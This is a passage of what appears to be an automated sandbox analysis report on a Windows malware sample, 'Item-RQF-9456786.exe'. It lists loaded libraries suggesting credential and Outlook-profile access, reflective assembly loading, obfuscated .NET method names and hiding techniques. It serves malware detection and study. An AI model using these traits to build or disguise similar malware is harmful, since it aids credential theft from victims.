    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: winsqlite3.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
    Source: Item-RQF-9456786.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Item-RQF-9456786.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Item-RQF-9456786.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: fontview.pdbGCTL source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fontview.pdb source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdbSHA256}Mz source: Item-RQF-9456786.exe
    Source: Binary string: wntdll.pdbUGP source: Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: Item-RQF-9456786.exe, Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdb source: Item-RQF-9456786.exe

    Data Obfuscation

    barindex
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.cs.Net Code: jv3yWNB5U9 System.Reflection.Assembly.Load(byte[])
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.cs.Net Code: jv3yWNB5U9 System.Reflection.Assembly.Load(byte[])
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00418883 push esi; iretd 5_2_0041888F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00414920 pushfd ; retf 5_2_00414922
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0041AA63 push es; iretd 5_2_0041AB3F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00416A03 push es; ret 5_2_00416AB2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004022F1 push edx; iretd 5_2_004022F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00401A8E push edx; iretd 5_2_00401A8F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00418347 push es; retf 5_2_0041834A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00402356 push edx; iretd 5_2_0040235F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00402336 push edx; iretd 5_2_00402337
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00415C35 push ebx; ret 5_2_00415C5C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00415C8E push ebx; ret 5_2_00415C5C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0040249B push edx; iretd 5_2_0040249E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004035D0 push eax; ret 5_2_004035D2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004186A4 push edx; retf 5_2_004186A6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00412775 push esp; iretd 5_2_00412780
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00418776 push 3344722Fh; retf 5_2_0041877B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004017C4 push esi; ret 5_2_004017C5
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00426FF3 push edi; ret 5_2_00426FFE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A09AD push ecx; mov dword ptr [esp], ecx5_2_017A09B6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD09AD push ecx; mov dword ptr [esp], ecx10_2_04FD09B6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03024310 push 0000004Bh; retf 10_2_0302435A
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0301C258 push ss; retf 10_2_0301C279
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030152B0 push esi; iretd 10_2_030152BC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03021142 push eax; iretd 10_2_03021143
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300F1A2 push esp; iretd 10_2_0300F1AD
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030151A3 push 3344722Fh; retf 10_2_030151A8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030150D1 push edx; retf 10_2_030150D3
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030210F9 push esi; retf 10_2_030210FA
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03007710 push esi; ret 10_2_03007817
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030077E1 push esi; ret 10_2_03007817
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03020623 pushad ; iretd 10_2_0302062C
    Source: Item-RQF-9456786.exeStatic PE information: section name: .text entropy: 7.853755430579226
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Jy5iybciGNKgpkitDn5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r9fbaPloeU', 'l3GbSJFyTr', 'F8qbHfm3HH', 'cCcbA00TH9', 'hO7bMiqyBy', 'AE3bERniZq', 'o7mbuhM21h'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, t0B6F3CbsMWHWYkMW5.csHigh entropy of concatenated method names: 'Gaxt18I8wF', 'LqHtYk7YeC', 'znwq4bbTRf', 'wKsqB56IOd', 'hxiqTg8JDG', 'LQtqKcSpDL', 'pDSqIMDSxV', 'JEvqvGUOvh', 'eXxq8ZFd0H', 'GTGq0xZ4Sp'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, umtTKgccHtxKEKhdOVR.csHigh entropy of concatenated method names: 'zvgbpvgPbF', 'MSJbz52C2r', 'dVt3isIvSZ', 'Se33cR6kmR', 'bbX3wJCVTP', 'hNk32MJOdD', 'yKO3yYLlvf', 'pIt3Gr4s5y', 'zwj3ZrjEPx', 'lPH3hM9BqW'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, hQdeTJw2s4migsdlPC.csHigh entropy of concatenated method names: 'BgWWEQ35N', 'He6RTkKiR', 'J0wkuYbXB', 'mPeYP44Nj', 'LQyNr1KLJ', 'glVCBmBhC', 'darawLwSxWha3lmMZ1', 'SNOjOPR1fb6kFtlfxr', 'wl3s72SL8', 'FuDbTfXU2'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, io3g4TcwqPpT4hcSLeQ.csHigh entropy of concatenated method names: 'ToString', 'ra53Q7DGrn', 'z8s3Nl8Nyp', 'R2s3CdgAiS', 'vip3ge6qnM', 'Llf3XcOO10', 'IsJ34Eirfm', 'un93BtQtUH', 'e2gRBKXmcR1bKZhjHVF', 'SjNyJ2XFB8WR5OrjgIj'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, g6eJXF5d5MiwYDIo8u.csHigh entropy of concatenated method names: 'z4ePlnQW0h', 'YKdPfuYNSG', 'P8rPP83HDI', 'zKvP3ds47A', 'vLlPLYrHkh', 'g2FPdu0cv0', 'Dispose', 'asAsZZxt8R', 'PiZshe1ZpD', 'Vc5sqAqtZN'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, pL3ft4KLeZybXOc8wg.csHigh entropy of concatenated method names: 'ul9VEiRCaL', 'bx8Vuq0DQR', 'pkhVFbBUpy', 'ToString', 'mwDVJsAe2X', 'jciV5S7ZbM', 'kfh6Ted9Ghsl19Ko7Bf', 'yox8CYdqRAwHKcB2Tog', 'HopZ4ndfcMNwyJKVacT'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, SJjdQFAhNNm6En8H63.csHigh entropy of concatenated method names: 'kwsl0hNa2d', 'zt1lSu3hZ8', 'lN2lAq9rUo', 'sQLlMj8OhA', 'iRilXU7wnK', 'LZXl4ZGdRj', 'JkYlB1IglS', 'lOxlTMDN0e', 'bgelKtGEZ6', 'iLMlIDSevy'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, PoB1cIgSsI1qObyZPE.csHigh entropy of concatenated method names: 'rE3VGMOWjm', 'C5CVhqEF2T', 't99Vt7AScJ', 'dO4VOtmUNg', 'uqCV97XxTP', 'tF9tFW7jeQ', 'xlbtJcm30k', 'DAut5b8HgM', 'gcwtjIP0O6', 'q6FtDapqno'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Rl3VgVQKcLZDKcmexA.csHigh entropy of concatenated method names: 'llDhAXHmVl', 'EyLhM755WV', 'mBahEfEPQP', 'PjnhuR5GEi', 'QrrhF7yiVv', 'IVlhJJ2kJK', 'vvNh5t6nn6', 'raKhjf4nZS', 'DaUhDgkGqo', 'qdDhpPRYWs'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, wOBg4wcyI0ZZnpw4uI9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rYE6P5dh6M', 'JxM6bfeMc7', 'QA963R9UY6', 'Q2p66Fu0g7', 'Geg6LaRkOi', 'dmy6e9yHyd', 'lAj6dSZv4d'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, xK9OtPIZsaGBamOURe.csHigh entropy of concatenated method names: 'genOZZxPH2', 'tpZOq14nS4', 'irYOVyAy01', 'A5WVpG8EeA', 'vxGVzbZaU0', 'dD7OiUyp5m', 'vEDOc5t2xT', 'sjuOwh4NLU', 'KsUO2SGalP', 'HtlOyZFwH9'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, uF1R8kz44eKs1T5cY3.csHigh entropy of concatenated method names: 'uL8bk9IQWw', 'yNYbQbVfJm', 'OELbN3KPnF', 'yB0bgOFGiA', 'dMJbXPupte', 'xUpbBrcVL5', 'QXDbTf0DkR', 'hqpbd7WTKq', 'CN3b7XvK07', 'TYubxrG14A'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Hi6LwOHirYGhEb6tYg.csHigh entropy of concatenated method names: 'qktoQp0fdI', 'Gl8oNrDI8o', 'Tkfogfd4NV', 'OaYoXoppTa', 'fnFoBykY5L', 'wvfoT2mrmC', 'praoIPD5eC', 'w5EovbYwko', 'qgTo0pcXvX', 'wNKoaumHPY'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, JyWoP2Eee5uZ2XXchT.csHigh entropy of concatenated method names: 'ToString', 'l6VUasLY79', 'UHcUXsD818', 'ydRU4s8kiE', 'pCuUBUYrUL', 'fA1UT7e3vk', 'eRHUKetmFr', 'qalUIj12fC', 'fjBUvBJOux', 'FYEU83DVCG'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, jMXtcppP8YjE6UCMvL.csHigh entropy of concatenated method names: 'R4DbqCxLRM', 'sXHbtcqaMX', 'hXlbV1q4io', 'DcMbOYREMr', 'spMbPa7n1X', 'oGtb9TK0yS', 'Next', 'Next', 'Next', 'NextBytes'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, MJrUimJk1Xk77kkrYN.csHigh entropy of concatenated method names: 'XqwfjafRbp', 'OiVfpkTaIh', 'hmEsiK5aZt', 'rx5sca0NLY', 'pv7faawj2h', 'F6DfSRwm6f', 'dfxfHDEXoR', 'e4RfAT166B', 'y9ZfMVl3LC', 'yO8fECHNWZ'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.csHigh entropy of concatenated method names: 'c5R2GTPaaV', 'cxY2ZqxMhX', 'Bol2hgyAJw', 'Wtb2qRst6s', 'zkE2tVnHpN', 'r5x2V15096', 'D9H2ODKayX', 'Paf29YCXfb', 'J5G2mryrQZ', 'gvn2rFK57Q'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, CLnJCPNxZWM54HFCkd.csHigh entropy of concatenated method names: 'M4FqRUneg0', 'uabqkpJtB3', 'mGYqQA3eqA', 'SgaqNC2R24', 'YVmqlHSfDg', 'wjyqUJXYMp', 'Jl0qf6nRYc', 'Uoxqs5bPNX', 'LejqPpgpgW', 'NytqbtpOGp'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, kd9epYD6rkLk16F07N.csHigh entropy of concatenated method names: 'vVRPgcd4Ye', 'GcHPXkOfAr', 'IvqP41UBNl', 'T8FPB7BfLn', 'QupPTdJglc', 'NK8PKUjbuW', 'b02PIG617Q', 'vRMPvHRDnb', 'QH8P85tFdg', 'FQmP0KRdt8'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, bOYT4bh2RalxK3XQZm.csHigh entropy of concatenated method names: 'Dispose', 'SiwcDYDIo8', 'jGFwX7w9W2', 'aEp4b2iMpm', 'T0QcpItPZ0', 'NZMczyKp71', 'ProcessDialogKey', 'Bi9wid9epY', 'urkwcLk16F', 'N7NwwVMXtc'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, iqJtJc8erySJY2aEtE.csHigh entropy of concatenated method names: 'TkYO7EOhiA', 'PNSOx1FNoe', 'lZEOWf86by', 'Ay6ORS1Eds', 'j7qO1aj5q5', 'WdYOkrwlUE', 'zKSOY2M7xS', 'fdtOQLhVBT', 'EOWONNihxC', 'Q86OCvJYHp'
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, HoR3qiylS3CJF5Gc3f.csHigh entropy of concatenated method names: 'T8McOl3VgV', 'KcLc9ZDKcm', 'sxZcrWM54H', 'UCkcnd30B6', 'CkMclW5SoB', 'BcIcUSsI1q', 'YyLRcjTQsRE5ZyZg4S', 'yK3cQo323arqfgQboU', 'JnWccIj3ME', 'Bhrc29JSPK'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Jy5iybciGNKgpkitDn5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r9fbaPloeU', 'l3GbSJFyTr', 'F8qbHfm3HH', 'cCcbA00TH9', 'hO7bMiqyBy', 'AE3bERniZq', 'o7mbuhM21h'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, t0B6F3CbsMWHWYkMW5.csHigh entropy of concatenated method names: 'Gaxt18I8wF', 'LqHtYk7YeC', 'znwq4bbTRf', 'wKsqB56IOd', 'hxiqTg8JDG', 'LQtqKcSpDL', 'pDSqIMDSxV', 'JEvqvGUOvh', 'eXxq8ZFd0H', 'GTGq0xZ4Sp'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, umtTKgccHtxKEKhdOVR.csHigh entropy of concatenated method names: 'zvgbpvgPbF', 'MSJbz52C2r', 'dVt3isIvSZ', 'Se33cR6kmR', 'bbX3wJCVTP', 'hNk32MJOdD', 'yKO3yYLlvf', 'pIt3Gr4s5y', 'zwj3ZrjEPx', 'lPH3hM9BqW'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, hQdeTJw2s4migsdlPC.csHigh entropy of concatenated method names: 'BgWWEQ35N', 'He6RTkKiR', 'J0wkuYbXB', 'mPeYP44Nj', 'LQyNr1KLJ', 'glVCBmBhC', 'darawLwSxWha3lmMZ1', 'SNOjOPR1fb6kFtlfxr', 'wl3s72SL8', 'FuDbTfXU2'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, io3g4TcwqPpT4hcSLeQ.csHigh entropy of concatenated method names: 'ToString', 'ra53Q7DGrn', 'z8s3Nl8Nyp', 'R2s3CdgAiS', 'vip3ge6qnM', 'Llf3XcOO10', 'IsJ34Eirfm', 'un93BtQtUH', 'e2gRBKXmcR1bKZhjHVF', 'SjNyJ2XFB8WR5OrjgIj'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, g6eJXF5d5MiwYDIo8u.csHigh entropy of concatenated method names: 'z4ePlnQW0h', 'YKdPfuYNSG', 'P8rPP83HDI', 'zKvP3ds47A', 'vLlPLYrHkh', 'g2FPdu0cv0', 'Dispose', 'asAsZZxt8R', 'PiZshe1ZpD', 'Vc5sqAqtZN'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, pL3ft4KLeZybXOc8wg.csHigh entropy of concatenated method names: 'ul9VEiRCaL', 'bx8Vuq0DQR', 'pkhVFbBUpy', 'ToString', 'mwDVJsAe2X', 'jciV5S7ZbM', 'kfh6Ted9Ghsl19Ko7Bf', 'yox8CYdqRAwHKcB2Tog', 'HopZ4ndfcMNwyJKVacT'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, SJjdQFAhNNm6En8H63.csHigh entropy of concatenated method names: 'kwsl0hNa2d', 'zt1lSu3hZ8', 'lN2lAq9rUo', 'sQLlMj8OhA', 'iRilXU7wnK', 'LZXl4ZGdRj', 'JkYlB1IglS', 'lOxlTMDN0e', 'bgelKtGEZ6', 'iLMlIDSevy'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, PoB1cIgSsI1qObyZPE.csHigh entropy of concatenated method names: 'rE3VGMOWjm', 'C5CVhqEF2T', 't99Vt7AScJ', 'dO4VOtmUNg', 'uqCV97XxTP', 'tF9tFW7jeQ', 'xlbtJcm30k', 'DAut5b8HgM', 'gcwtjIP0O6', 'q6FtDapqno'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Rl3VgVQKcLZDKcmexA.csHigh entropy of concatenated method names: 'llDhAXHmVl', 'EyLhM755WV', 'mBahEfEPQP', 'PjnhuR5GEi', 'QrrhF7yiVv', 'IVlhJJ2kJK', 'vvNh5t6nn6', 'raKhjf4nZS', 'DaUhDgkGqo', 'qdDhpPRYWs'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, wOBg4wcyI0ZZnpw4uI9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rYE6P5dh6M', 'JxM6bfeMc7', 'QA963R9UY6', 'Q2p66Fu0g7', 'Geg6LaRkOi', 'dmy6e9yHyd', 'lAj6dSZv4d'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, xK9OtPIZsaGBamOURe.csHigh entropy of concatenated method names: 'genOZZxPH2', 'tpZOq14nS4', 'irYOVyAy01', 'A5WVpG8EeA', 'vxGVzbZaU0', 'dD7OiUyp5m', 'vEDOc5t2xT', 'sjuOwh4NLU', 'KsUO2SGalP', 'HtlOyZFwH9'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, uF1R8kz44eKs1T5cY3.csHigh entropy of concatenated method names: 'uL8bk9IQWw', 'yNYbQbVfJm', 'OELbN3KPnF', 'yB0bgOFGiA', 'dMJbXPupte', 'xUpbBrcVL5', 'QXDbTf0DkR', 'hqpbd7WTKq', 'CN3b7XvK07', 'TYubxrG14A'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Hi6LwOHirYGhEb6tYg.csHigh entropy of concatenated method names: 'qktoQp0fdI', 'Gl8oNrDI8o', 'Tkfogfd4NV', 'OaYoXoppTa', 'fnFoBykY5L', 'wvfoT2mrmC', 'praoIPD5eC', 'w5EovbYwko', 'qgTo0pcXvX', 'wNKoaumHPY'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, JyWoP2Eee5uZ2XXchT.csHigh entropy of concatenated method names: 'ToString', 'l6VUasLY79', 'UHcUXsD818', 'ydRU4s8kiE', 'pCuUBUYrUL', 'fA1UT7e3vk', 'eRHUKetmFr', 'qalUIj12fC', 'fjBUvBJOux', 'FYEU83DVCG'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, jMXtcppP8YjE6UCMvL.csHigh entropy of concatenated method names: 'R4DbqCxLRM', 'sXHbtcqaMX', 'hXlbV1q4io', 'DcMbOYREMr', 'spMbPa7n1X', 'oGtb9TK0yS', 'Next', 'Next', 'Next', 'NextBytes'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, MJrUimJk1Xk77kkrYN.csHigh entropy of concatenated method names: 'XqwfjafRbp', 'OiVfpkTaIh', 'hmEsiK5aZt', 'rx5sca0NLY', 'pv7faawj2h', 'F6DfSRwm6f', 'dfxfHDEXoR', 'e4RfAT166B', 'y9ZfMVl3LC', 'yO8fECHNWZ'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.csHigh entropy of concatenated method names: 'c5R2GTPaaV', 'cxY2ZqxMhX', 'Bol2hgyAJw', 'Wtb2qRst6s', 'zkE2tVnHpN', 'r5x2V15096', 'D9H2ODKayX', 'Paf29YCXfb', 'J5G2mryrQZ', 'gvn2rFK57Q'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, CLnJCPNxZWM54HFCkd.csHigh entropy of concatenated method names: 'M4FqRUneg0', 'uabqkpJtB3', 'mGYqQA3eqA', 'SgaqNC2R24', 'YVmqlHSfDg', 'wjyqUJXYMp', 'Jl0qf6nRYc', 'Uoxqs5bPNX', 'LejqPpgpgW', 'NytqbtpOGp'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, kd9epYD6rkLk16F07N.csHigh entropy of concatenated method names: 'vVRPgcd4Ye', 'GcHPXkOfAr', 'IvqP41UBNl', 'T8FPB7BfLn', 'QupPTdJglc', 'NK8PKUjbuW', 'b02PIG617Q', 'vRMPvHRDnb', 'QH8P85tFdg', 'FQmP0KRdt8'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, bOYT4bh2RalxK3XQZm.csHigh entropy of concatenated method names: 'Dispose', 'SiwcDYDIo8', 'jGFwX7w9W2', 'aEp4b2iMpm', 'T0QcpItPZ0', 'NZMczyKp71', 'ProcessDialogKey', 'Bi9wid9epY', 'urkwcLk16F', 'N7NwwVMXtc'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, iqJtJc8erySJY2aEtE.csHigh entropy of concatenated method names: 'TkYO7EOhiA', 'PNSOx1FNoe', 'lZEOWf86by', 'Ay6ORS1Eds', 'j7qO1aj5q5', 'WdYOkrwlUE', 'zKSOY2M7xS', 'fdtOQLhVBT', 'EOWONNihxC', 'Q86OCvJYHp'
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, HoR3qiylS3CJF5Gc3f.csHigh entropy of concatenated method names: 'T8McOl3VgV', 'KcLc9ZDKcm', 'sxZcrWM54H', 'UCkcnd30B6', 'CkMclW5SoB', 'BcIcUSsI1q', 'YyLRcjTQsRE5ZyZg4S', 'yK3cQo323arqfgQboU', 'JnWccIj3ME', 'Bhrc29JSPK'

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
